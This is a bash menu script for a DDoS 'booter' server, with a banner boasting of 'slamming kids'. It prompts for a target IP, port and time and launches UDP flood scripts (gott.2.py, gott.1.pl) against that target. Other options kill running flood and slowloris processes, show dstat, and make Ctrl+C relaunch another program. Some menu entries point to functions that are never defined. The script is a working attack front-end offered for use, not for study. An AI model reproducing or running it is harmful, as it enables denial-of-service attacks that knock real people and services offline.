#!/bin/bash
BLACK='\e[0;30m'
BLUE='\e[0;34m'
GREEN='\e[0;32m'
CYAN='\e[0;36m'
RED='\e[0;31m'
PURPLE='\e[0;35m'
BROWN='\e[0;33m'
LIGHTGRAY='\e[0;37m'
DARKGRAY='\e[1;30m'
LIGHTBLUE='\e[1;34m'
LIGHTGREEN='\e[1;32m'
LIGHTCYAN='\e[1;36m'
LIGHTRED='\e[1;31m'
LIGHTPURPLE='\e[1;35m'
YELLOW='\e[1;33m'
WHITE='\e[0;37m'
LWHITE='\e[1;37m'
NC='\e[0m'              # No Color
# Trap Signal Script
#
#TitaniumScript.bypass//BASH  Bypass.Function
#load
exit_script()
{
  echo "* * *Trap * * *"
  ./m
}

dstat1()
{
    clear
    echo -e " ${PURPLE} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                          WEED DSTAT                              ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
dstat
    
}

admin12()
{
    clear
    echo -e " ${CYAN} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                          ADMIN PANEL                              ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
echo "Create Your Own Panel"
echo "null"
echo "Enter Target IP:"
read ip
echo "Enter Port:"
read port
echo "Enter Time:"
read time
python gott.2.py $ip $port $time
}

killall()
{
    clear
    echo -e " ${BLUE} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                        PRIVATE VERSION 2.0 !                      ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ¦¦¦${CYAN}                                  Sparks${CYAN}                             ¦¦¦ " 
    echo -e "  ¦¦¦${CYAN}                               SCRIPT${CYAN}                              ¦¦¦ " 
    echo -e "  ¦¦¦${CYAN}                                 BY${BLUE}                                ¦¦¦ "
    echo -e "  ¦¦¦${BLUE}                               Sparks MENU${GREEN}                          ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                           Version 1.5                             ¦¦¦ "
    echo "  ¦¦¦+--------------------------------------------------------------------¦ " 
pkill gott.1.pl
pkill gott.2.py
pkill gott.2.pl
pkill gott.4.pl
pkill slowloris
}

udp_flooda(){
echo -en "Enter IP:"
read ip
echo -en "Enter Port:"
read port
echo -en "Enter Time:"
read time
python gott.2.py ${ip} ${port} ${time} 
}

udp_floodb(){
echo -en "Enter IP:"
read ip
echo -en "Enter Port:"
read port
echo -en "Enter Time"
read time
perl gott.1.pl ${ip} ${port}  ${time}
}

exit_script1()
{
  exit 1
}

Take_input1()
{
clear
while :
do
clear;clear
echo -en "    
                  ${LIGHTGREEN}***********                               
               ***** ***********              
            ** ****** *** ********             ${RED}Hmmm ${CYAN}Who ${LIGHTPURPLE}To ${LIGHTGREEN}Slam ${BROWN}Today ${LIGHTGREEN}
           ****  ******  ** *******          ${WHITE}O ${LIGHTGREEN}
           ***     ******* ** ******      ${WHITE}O ${LIGHTGREEN}
           ***       **        *  **   ${WHITE}O ${LIGHTGREEN}
            *|/------  -------\ ** *
             |       |=|       :===**
              |  O  |   | O   |  }|*
               |---- |   ----  |  |*          ${BROWN}*****************************${LIGHTGREEN}
               |    |___       |\/            ${LIGHTPURPLE}*   ${LIGHTPURPLE}Created By: iDontRte    *${LIGHTGREEN}
               |              |               ${LIGHTCYAN}*    ${LIGHTCYAN}Slamming Kids Since 2011     *${LIGHTGREEN}
               \   -----     |                ${RED}*   ${RED}Use Port 53 NOOBS :)  *${LIGHTGREEN}
                \           |                 ${BROWN}*****************************${LIGHTGREEN}
                  -__ -- -/


                       ${LIGHTPURPLE}Welcome To Rte's DDoS Server${WHITE}

[==============================================================================]
 ${RED}»»»»»»»»»»»»»»»»»»» ${BROWN}PRESS 1 AND ENTER TO SEND AN ATTACK${LIGHTCYAN} ${RED}««««««««««««««««««««««
${WHITE}[==============================================================================]

${BROWN}#USER:${LIGHTCYAN}"
    read yourch
    case $yourch in
      1) udp_flooda ;;
      2) udp_floodb ;;
	  3) killall ;;
	  4) passwd ;;
	  5) multi ;;
	  6) dstat1 ;;
	  7) and ;;
	  8) admin12 ;;
	  AI) autoinstall ;;
      ex) echo "As you Command" ;  exit 1  ;;
	  9) pkill menu  ;;
      *) echo "Invalid Selection, Please make another selection between [1-11]" ;
         echo "Press Enter. . ." ; read ;;
 esac
done # end_while
}
#
# Set trap to for CTRL+C interrupt i.e. Install our error handler
# When occurs it first it calls del_file() and then exit
#
trap exit_script 2
#
# Call our user define function : Take_input1
#
clear;clear
echo -en "${LIGHTGREEN}Press Enter To Continue${RED}" 
read USERNAME
Take_input1